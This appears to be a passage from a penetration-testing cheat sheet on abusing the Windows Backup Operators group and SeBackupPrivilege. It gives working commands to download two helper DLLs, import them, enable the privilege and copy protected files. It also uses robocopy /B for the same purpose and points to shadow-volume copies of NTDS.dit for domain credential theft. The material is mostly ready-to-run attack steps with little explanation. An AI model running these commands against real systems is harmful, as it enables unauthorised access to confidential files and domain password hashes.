Built-in group in windows Allows you to copy a file, and be able to read it !IMPORTANT: if copying
NTDS.dit, make sure to create a shadow volume first, head to7. Lateral Movement/DCSyncfor more detail
SeBackupPrivilege#
This repo contains 2 .dll that you can use to enable and use the privilege of backup operators
wget https://github.com/giuliano108/SeBackupPrivilege/raw/refs/heads/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll
wget https://github.com/giuliano108/SeBackupPrivilege/raw/refs/heads/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dllImport-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dllView privilege
whoami /priv
Get-SeBackupPrivilegeEnable SeBackupPrivilege
Set-SeBackupPrivilegeCopy files
Copy-FileSeBackupPrivilege 'C:\confidential\file.docx' .\file.docxRobocopy#
This is a built-in windows utility. Unlike copy, it can run with your
SeBackupPrivilege, no need for external tool
robocopy /B C:\Confidential .\Confidential file.docx